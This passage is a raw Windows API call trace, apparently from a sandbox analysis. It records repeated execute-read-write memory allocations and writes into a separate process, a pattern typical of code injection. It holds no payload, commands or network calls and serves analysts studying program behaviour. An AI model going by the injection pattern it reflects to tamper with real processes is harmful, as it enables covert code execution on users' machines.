ProcessHandle=0x12c, BaseAddress=0x28dc18*=0x0, ZeroBits=0x0, RegionSize=0x28dbc8*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28dc18*=0xe0000, RegionSize=0x28dbc8*=0x1000) returned 0x0 [0241.321] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0xe0000, Buffer=0x1470000*, NumberOfBytesToWrite=0x30, NumberOfBytesWritten=0x28dc20 | out: Buffer=0x1470000*, NumberOfBytesWritten=0x28dc20*=0x30) returned 0x0 [0241.321] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28dc88*, NumberOfBytesToWrite=0x48, NumberOfBytesWritten=0x28dc40 | out: Buffer=0x28dc88*, NumberOfBytesWritten=0x28dc40*=0x48) returned 0x0 [0241.321] NtClearEvent (EventHandle=0x144) returned 0x0 [0241.321] NtSignalAndWaitForSingleObject (SignalObject=0x140, WaitObject=0x144, Alertable=0, Time=0x0) returned 0x0 [0241.323] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28dc88, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28dc50 | out: Buffer=0x28dc88*, NumberOfBytesRead=0x28dc50*=0x48) returned 0x0 [0241.323] NtFreeVirtualMemory (ProcessHandle=0x12c, BaseAddress=0x28dc78*=0xe0000, RegionSize=0x28dc68, FreeType=0x8000) returned 0x0 [0241.323] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28dc70*=0x1470000, RegionSize=0x28dc60, FreeType=0x8000) returned 0x0 [0241.324] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20029, Buffer=0x28dd80, NumberOfBytesToRead=0x8, NumberOfBytesRead=0x28dd68 | out: Buffer=0x28dd80*, NumberOfBytesRead=0x28dd68*=0x8) returned 0x0 [0241.324] NtFreeVirtualMemory (ProcessHandle=0x12c, BaseAddress=0x28dda8*=0x20000, RegionSize=0x28dda0, FreeType=0x8000) returned 0x0 [0241.324] NtAllocateVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28df78*=0x0, ZeroBits=0x0, RegionSize=0x28dfa8*=0x29, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28df78*=0x20000, RegionSize=0x28dfa8*=0x1000) returned 0x0 [0241.324] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20010, Buffer=0x52c82e*, NumberOfBytesToWrite=0x11, NumberOfBytesWritten=0x28df88 | out: Buffer=0x52c82e*, NumberOfBytesWritten=0x28df88*=0x11) returned 0x0 [0241.324] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20000, Buffer=0x28df68*, NumberOfBytesToWrite=0x10, NumberOfBytesWritten=0x28df80 | out: Buffer=0x28df68*, NumberOfBytesWritten=0x28df80*=0x10) returned 0x0 [0241.324] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de38 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de38*=0x48) returned 0x0 [0241.324] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de28*=0x0, ZeroBits=0x0, RegionSize=0x28de48*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de28*=0x1470000, RegionSize=0x28de48*=0x1000) returned 0x0 [0241.324] NtAllocateVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28de08*=0x0, ZeroBits=0x0, RegionSize=0x28ddb8*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de08*=0xe0000, RegionSize=0x28ddb8*=0x1000) returned 0x0 [0241.324] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0xe0000, Buffer=0x1470000*, NumberOfBytesToWrite=0x30, NumberOfBytesWritten=0x28de10 | out: Buffer=0x1470000*, NumberOfBytesWritten=0x28de10*=0x30) returned 0x0 [0241.325] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78*, NumberOfBytesToWrite=0x48, NumberOfBytesWritten=0x28de30 | out: Buffer=0x28de78*, NumberOfBytesWritten=0x28de30*=0x48) returned 0x0 [0241.325] NtClearEvent (EventHandle=0x144) returned 0x0 [0241.325] NtSignalAndWaitForSingleObject (SignalObject=0x140, WaitObject=0x144, Alertable=0, Time=0x0) returned 0x0 [0241.325] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de40 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de40*=0x48) returned 0x0 [0241.325] NtFreeVirtualMemory (ProcessHandle=0x12c, BaseAddress=0x28de68*=0xe0000, RegionSize=0x28de58, FreeType=0x8000) returned 0x0 [0241.325] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de60*=0x1470000, RegionSize=0x28de50, FreeType=0x8000) returned 0x0 [0241.325] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20021, Buffer=0x28e008, NumberOfBytesToRead=0x8, NumberOfBytesRead=0x28df58 | out: Buffer=0x28e008*, NumberOfBytesRead=0x28df58*=0x8) returned 0x0 [0241.326] NtFreeVirtualMemory (ProcessHandle=0x12c, BaseAddress=0x28df98*=0x20000, RegionSize=0x28dfa0, FreeType=0x8000) returned 0x0 [0241.326] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x14002a000, Buffer=0x28e280*, NumberOfBytesToWrite=0x8, NumberOfBytesWritten=0x28e060 | out: Buffer=0x28e280*, NumberOfBytesWritten=0x28e060*=0x8) returned 0x0 [0241.326] NtAllocateVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28df78*=0x0, ZeroBits=0x0, RegionSize=0x28dfa8*=0x24, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28df78*=0x20000, RegionSize=0x28dfa8*=0x1000) returned 0x0 [0241.326] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20010, Buffer=0x52c842*, NumberOfBytesToWrite=0xc, NumberOfBytesWritten=0x28df88 | out: Buffer=0x52c842*, NumberOfBytesWritten=0x28df88*=0xc) returned 0x0 [0241.326] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20000, Buffer=0x28df68*, NumberOfBytesToWrite=0x10, NumberOfBytesWritten=0x28df80 | out: Buffer=0x28df68*, NumberOfBytesWritten=0x28df80*=0x10) returned 0x0 [0241.326] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de38 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de38*=0x48) returned 0x0 [0241.326] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de28*=0x0, ZeroBits=0x0, RegionSize=0x28de48*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de28*=0x1470000, RegionSize=0x28de48*=0x1000) returned 0x0 [0241.326] NtAllocateVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28de08*=0x0, ZeroBits=0x0, RegionSize=0x28ddb8*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de08*=0xe0000, RegionSize=0x28ddb8*=0x1000) returned 0x0 [0241.326] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0xe0000, Buffer=0x1470000*, NumberOfBytesToWrite=0x30, NumberOfBytesWritten=0x28de10 | out: Buffer=0x1470000*, NumberOfBytesWritten=0x28de10*=0x30) returned 0x0 [0241.327] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78*, NumberOfBytesToWrite=0x48, NumberOfBytesWritten=0x28de30 | out: Buffer=0x28de78*, NumberOfBytesWritten=0x28de30*=0x48) returned 0x0 [0241.327] NtClearEvent (EventHandle=0x144) returned 0x0 [0241.327] NtSignalAndWaitForSingleObject (SignalObject=0x140, WaitObject=0x144, Alertable=0, Time=0x0) returned 0x0 [0241.327] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de40 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de40*=0x48) returned 0x0 [0241.327] NtFreeVirtualMemory (ProcessHandle=0x12c, BaseAddress=0x28de68*=0xe0000, RegionSize=0x28de58, FreeType=0x8000) returned 0x0 [0241.327] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de60*=0x1470000, RegionSize=0x28de50, FreeType=0x8000) returned 0x0 [0241.327] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x2001c, Buffer=0x28e008, NumberOfBytesToRead=0x8, NumberOfBytesRead=0x28df58 | out: Buffer=0x28e008*, NumberOfBytesRead=0x28df58*=0x8) returned 0x0 [0241.327] NtFreeVirtualMemory (ProcessHandle=0x12c, BaseAddress=0x28df98*=0x20000, RegionSize=0x28dfa0, FreeType=0x8000) returned 0x0 [0241.327] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x14002a008, Buffer=0x28e280*, NumberOfBytesToWrite=0x8, NumberOfBytesWritten=0x28e060 | out: Buffer=0x28e280*, NumberOfBytesWritten=0x28e060*=0x8) returned 0x0 [0241.328] NtAllocateVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28df78*=0x0, ZeroBits=0x0, RegionSize=0x28dfa8*=0x27, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28df78*=0x20000, RegionSize=0x28dfa8*=0x1000) returned 0x0 [0241.328] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20010, Buffer=0x52c850*, NumberOfBytesToWrite=0xf, NumberOfBytesWritten=0x28df88 | out: Buffer=0x52c850*, NumberOfBytesWritten=0x28df88*=0xf) returned 0x0 [0241.328] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20000, Buffer=0x28df68*, NumberOfBytesToWrite=0x10, NumberOfBytesWritten=0x28df80 | out: Buffer=0x28df68*, NumberOfBytesWritten=0x28df80*=0x10) returned 0x0 [0241.328] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de38 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de38*=0x48) returned 0x0 [0241.328] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de28*=0x0, ZeroBits=0x0, RegionSize=0x28de48*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de28*=0x1470000, RegionSize=0x28de48*=0x1000) returned 0x0 [0241.328] NtAllocateVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28de08*=0x0, ZeroBits=0x0, RegionSize=0x28ddb8*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de08*=0xe0000, RegionSize=0x28ddb8*=0x1000) returned 0x0 [0241.328] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0xe0000, Buffer=0x1470000*, NumberOfBytesToWrite=0x30, NumberOfBytesWritten=0x28de10 | out: Buffer=0x1470000*, NumberOfBytesWritten=0x28de10*=0x30) returned 0x0 [0241.328] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78*, NumberOfBytesToWrite=0x48, NumberOfBytesWritten=0x28de30 | out: Buffer=0x28de78*, NumberOfBytesWritten=0x28de30*=0x48) returned 0x0 [0241.329] NtClearEvent (EventHandle=0x144) returned 0x0 [0241.329] NtSignalAndWaitForSingleObject (SignalObject=0x140, WaitObject=0x144, Alertable=0, Time=0x0) returned 0x0 [0241.329] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de40 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de40*=0x48) returned 0x0 [0241.329] NtFreeVirtualMemory (ProcessHandle=0x12c, BaseAddress=0x28de68*=0xe0000, RegionSize=0x28de58, FreeType=0x8000) returned 0x0 [0241.329] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de60*=0x1470000, RegionSize=0x28de50, FreeType=0x8000) returned 0x0 [0241.329] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x2001f, Buffer=0x28e008, NumberOfBytesToRead=0x8, NumberOfBytesRead=0x28df58 | out: Buffer=0x28e008*, NumberOfBytesRead=0x28df58*=0x8) returned 0x0 [0241.329] NtFreeVirtualMemory (ProcessHandle=0x12c, BaseAddress=0x28df98*=0x20000, RegionSize=0x28dfa0, FreeType=0x8000) returned 0x0 [0241.329] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x14002a010, Buffer=0x28e280*, NumberOfBytesToWrite=0x8, NumberOfBytesWritten=0x28e060 | out: Buffer=0x28e280*, NumberOfBytesWritten=0x28e060*=0x8) returned 0x0 [0241.329] NtAllocateVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28df78*=0x0, ZeroBits=0x0, RegionSize=0x28dfa8*=0x25, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28df78*=0x20000, RegionSize=0x28dfa8*=0x1000) returned 0x0 [0241.329] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20010, Buffer=0x52cbd2*, NumberOfBytesToWrite=0xd, NumberOfBytesWritten=0x28df88 | out: Buffer=0x52cbd2*, NumberOfBytesWritten=0x28df88*=0xd) returned 0x0 [0241.330] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20000, Buffer=0x28df68*, NumberOfBytesToWrite=0x10, NumberOfBytesWritten=0x28df80 | out: Buffer=0x28df68*, NumberOfBytesWritten=0x28df80*=0x10) returned 0x0 [0241.330] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de38 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de38*=0x48) returned 0x0 [0241.330] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de28*=0x0, ZeroBits=0x0, RegionSize=0x28de48*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de28*=0x1470000, RegionSize=0x28de48*=0x1000) returned 0x0 [0241.330] NtAllocateVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28de08*=0x0, ZeroBits=0x0, RegionSize=0x28ddb8*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de08*=0xe0000, RegionSize=0x28ddb8*=0x1000) returned 0x0 [0241.330] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0xe0000, Buffer=0x1470000*, NumberOfBytesToWrite=0x30, NumberOfBytesWritten=0x28de10 | out: Buffer=0x1470000*, NumberOfBytesWritten=0x28de10*=0x30) returned 0x0 [0241.330] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78*, NumberOfBytesToWrite=0x48, NumberOfBytesWritten=0x28de30 | out: Buffer=0x28de78*, NumberOfBytesWritten=0x28de30*=0x48) returned 0x0 [0241.330] NtClearEvent (EventHandle=0x144) returned 0x0 [0241.330] NtSignalAndWaitForSingleObject (SignalObject=0x140, WaitObject=0x144, Alertable=0, Time=0x0) returned 0x0 [0241.331] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de40 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de40*=0x48) returned 0x0 [0241.331] NtFreeVirtualMemory (ProcessHandle=0x12c, BaseAddress=0x28de68*=0xe0000, RegionSize=0x28de58, FreeType=0x8000) returned 0x0 [0241.331] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de60*=0x1470000, RegionSize=0x28de50, FreeType=0x8000) returned 0x0 [0241.331] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x2001d, Buffer=0x28e008, NumberOfBytesToRead=0x8, NumberOfBytesRead=0x28df58 | out: Buffer=0x28e008*, NumberOfBytesRead=0x28df58*=0x8) returned 0x0 [0241.331] NtFreeVirtualMemory (ProcessHandle=0x12c, BaseAddress=0x28df98*=0x20000, RegionSize=0x28dfa0, FreeType=0x8000) returned 0x0 [0241.331] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x14002a018, Buffer=0x28e280*, NumberOfBytesToWrite=0x8, NumberOfBytesWritten=0x28e060 | out: Buffer=0x28e280*, NumberOfBytesWritten=0x28e060*=0x8) returned 0x0 [0241.331] NtAllocateVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28df78*=0x0, ZeroBits=0x0, RegionSize=0x28dfa8*=0x29, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28df78*=0x20000, RegionSize=0x28dfa8*=0x1000) returned 0x0 [0241.331] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20010, Buffer=0x52cbbe*, NumberOfBytesToWrite=0x11, NumberOfBytesWritten=0x28df88 | out: Buffer=0x52cbbe*, NumberOfBytesWritten=0x28df88*=0x11) returned 0x0 [0241.332] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20000, Buffer=0x28df68*, NumberOfBytesToWrite=0x10, NumberOfBytesWritten=0x28df80 | out: Buffer=0x28df68*, NumberOfBytesWritten=0x28df80*=0x10) returned 0x0 [0241.332] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de38 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de38*=0x48) returned 0x0 [0241.332] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de28*=0x0, ZeroBits=0x0, RegionSize=0x28de48*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de28*=0x1470000, RegionSize=0x28de48*=0x1000) returned 0x0 [0241.332] NtAllocateVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28de08*=0x0, ZeroBits=0x0, RegionSize=0x28ddb8*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de08*=0xe0000, RegionSize=0x28ddb8*=0x1000) returned 0x0 [0241.332] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0xe0000, Buffer=0x1470000*, NumberOfBytesToWrite=0x30, NumberOfBytesWritten=0x28de10 | out: Buffer=0x1470000*, NumberOfBytesWritten=0x28de10*=0x30) returned 0x0 [0241.332] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78*, NumberOfBytesToWrite=0x48, NumberOfBytesWritten=0x28de30 | out: Buffer=0x28de78*, NumberOfBytesWritten=0x28de30*=0x48) returned 0x0 [0241.332] NtClearEvent (EventHandle=0x144) returned 0x0 [0241.332] NtSignalAndWaitForSingleObject (SignalObject=0x140, WaitObject=0x144, Alertable=0, Time=0x0) returned 0x0 [0241.333] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de40 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de40*=0x48) returned 0x0 [0241.333] NtFreeVirtualMemory (ProcessHandle=0x12c, BaseAddress=0x28de68*=0xe0000, RegionSize=0x28de58, FreeType=0x8000) returned 0x0 [0241.333] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de60*=0x1470000, RegionSize=0x28de50, FreeType=0x8000) returned 0x0 [0241.333] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20021, Buffer=0x28e008, NumberOfBytesToRead=0x8, NumberOfBytesRead=0x28df58 | out: Buffer=0x28e008*, NumberOfBytesRead=0x28df58*=0x8) returned 0x0 [0241.333] NtFreeVirtualMemory (ProcessHandle=0x12c, BaseAddress=0x28df98*=0x20000, RegionSize=0x28dfa0, FreeType=0x8000) returned 0x0 [0241.333] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x14002a020, Buffer=0x28e280*, NumberOfBytesToWrite=0x8, NumberOfBytesWritten=0x28e060 | out: Buffer=0x28e280*, NumberOfBytesWritten=0x28e060*=0x8) returned 0x0 [0241.333] NtAllocateVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28df78*=0x0, ZeroBits=0x0, RegionSize=0x28dfa8*=0x28, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28df78*=0x20000, RegionSize=0x28dfa8*=0x1000) returned 0x0 [0241.333] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20010, Buffer=0x52cbac*, NumberOfBytesToWrite=0x10, NumberOfBytesWritten=0x28df88 | out: Buffer=0x52cbac*, NumberOfBytesWritten=0x28df88*=0x10) returned 0x0 [0241.333] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20000, Buffer=0x28df68*, NumberOfBytesToWrite=0x10, NumberOfBytesWritten=0x28df80 | out: Buffer=0x28df68*, NumberOfBytesWritten=0x28df80*=0x10) returned 0x0 [0241.334] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de38 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de38*=0x48) returned 0x0 [0241.334] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de28*=0x0, ZeroBits=0x0, RegionSize=0x28de48*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de28*=0x1470000, RegionSize=0x28de48*=0x1000) returned 0x0 [0241.334] NtAllocateVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28de08*=0x0, ZeroBits=0x0, RegionSize=0x28ddb8*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de08*=0xe0000, RegionSize=0x28ddb8*=0x1000) returned 0x0 [0241.334] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0xe0000, Buffer=0x1470000*, NumberOfBytesToWrite=0x30, NumberOfBytesWritten=0x28de10 | out: Buffer=0x1470000*, NumberOfBytesWritten=0x28de10*=0x30) returned 0x0 [0241.334] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78*, NumberOfBytesToWrite=0x48, NumberOfBytesWritten=0x28de30 | out: Buffer=0x28de78*, NumberOfBytesWritten=0x28de30*=0x48) returned 0x0 [0241.334] NtClearEvent (EventHandle=0x144) returned 0x0 [0241.334] NtSignalAndWaitForSingleObject (SignalObject=0x140, WaitObject=0x144, Alertable=0, Time=0x0) returned 0x0 [0241.334] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de40 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de40*=0x48) returned 0x0 [0241.334] NtFreeVirtualMemory (ProcessHandle=0x12c, BaseAddress=0x28de68*=0xe0000, RegionSize=0x28de58, FreeType=0x8000) returned 0x0 [0241.335] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de60*=0x1470000, RegionSize=0x28de50, FreeType=0x8000) returned 0x0 [0241.335] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20020, Buffer=0x28e008, NumberOfBytesToRead=0x8, NumberOfBytesRead=0x28df58 | out: Buffer=0x28e008*, NumberOfBytesRead=0x28df58*=0x8) returned 0x0 [0241.335] NtFreeVirtualMemory (ProcessHandle=0x12c, BaseAddress=0x28df98*=0x20000, RegionSize=0x28dfa0, FreeType=0x8000) returned 0x0 [0241.335] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x14002a028, Buffer=0x28e280*, NumberOfBytesToWrite=0x8, NumberOfBytesWritten=0x28e060 | out: Buffer=0x28e280*, NumberOfBytesWritten=0x28e060*=0x8) returned 0x0 [0241.335] NtAllocateVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28df78*=0x0, ZeroBits=0x0, RegionSize=0x28dfa8*=0x25, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28df78*=0x20000, RegionSize=0x28dfa8*=0x1000) returned 0x0 [0241.335] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20010, Buffer=0x52cb9c*, NumberOfBytesToWrite=0xd, NumberOfBytesWritten=0x28df88 | out: Buffer=0x52cb9c*, NumberOfBytesWritten=0x28df88*=0xd) returned 0x0 [0241.335] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20000, Buffer=0x28df68*, NumberOfBytesToWrite=0x10, NumberOfBytesWritten=0x28df80 | out: Buffer=0x28df68*, NumberOfBytesWritten=0x28df80*=0x10) returned 0x0 [0241.335] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de38 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de38*=0x48) returned 0x0 [0241.337] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de28*=0x0, ZeroBits=0x0, RegionSize=0x28de48*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de28*=0x1470000, RegionSize=0x28de48*=0x1000) returned 0x0 [0241.337] NtAllocateVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28de08*=0x0, ZeroBits=0x0, RegionSize=0x28ddb8*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de08*=0xe0000, RegionSize=0x28ddb8*=0x1000) returned 0x0 [0241.337] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0xe0000, Buffer=0x1470000*, NumberOfBytesToWrite=0x30, NumberOfBytesWritten=0x28de10 | out: Buffer=0x1470000*, NumberOfBytesWritten=0x28de10*=0x30) returned 0x0 [0241.338] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78*, NumberOfBytesToWrite=0x48, NumberOfBytesWritten=0x28de30 | out: Buffer=0x28de78*, NumberOfBytesWritten=0x28de30*=0x48) returned 0x0 [0241.338] NtClearEvent (EventHandle=0x144) returned 0x0 [0241.338] NtSignalAndWaitForSingleObject (SignalObject=0x140, WaitObject=0x144, Alertable=0, Time=0x0) returned 0x0 [0241.338] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de40 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de40*=0x48) returned 0x0 [0241.338] NtFreeVirtualMemory (ProcessHandle=0x12c, BaseAddress=0x28de68*=0xe0000, RegionSize=0x28de58, FreeType=0x8000) returned 0x0 [0241.338] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de60*=0x1470000, RegionSize=0x28de50, FreeType=0x8000) returned 0x0 [0241.339] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x2001d, Buffer=0x28e008, NumberOfBytesToRead=0x8, NumberOfBytesRead=0x28df58 | out: Buffer=0x28e008*, NumberOfBytesRead=0x28df58*=0x8) returned 0x0 [0241.339] NtFreeVirtualMemory (ProcessHandle=0x12c, BaseAddress=0x28df98*=0x20000, RegionSize=0x28dfa0, FreeType=0x8000) returned 0x0 [0241.339] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x14002a030, Buffer=0x28e280*, NumberOfBytesToWrite=0x8, NumberOfBytesWritten=0x28e060 | out: Buffer=0x28e280*, NumberOfBytesWritten=0x28e060*=0x8) returned 0x0 [0241.339] NtAllocateVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28df78*=0x0, ZeroBits=0x0, RegionSize=0x28dfa8*=0x27, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28df78*=0x20000, RegionSize=0x28dfa8*=0x1000) returned 0x0 [0241.339] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20010, Buffer=0x52cb8a*, NumberOfBytesToWrite=0xf, NumberOfBytesWritten=0x28df88 | out: Buffer=0x52cb8a*, NumberOfBytesWritten=0x28df88*=0xf) returned 0x0 [0241.339] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20000, Buffer=0x28df68*, NumberOfBytesToWrite=0x10, NumberOfBytesWritten=0x28df80 | out: Buffer=0x28df68*, NumberOfBytesWritten=0x28df80*=0x10) returned 0x0 [0241.339] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de38 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de38*=0x48) returned 0x0 [0241.339] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de28*=0x0, ZeroBits=0x0, RegionSize=0x28de48*=0x30, AllocationType=0x3000, Protect=0x40 | out: 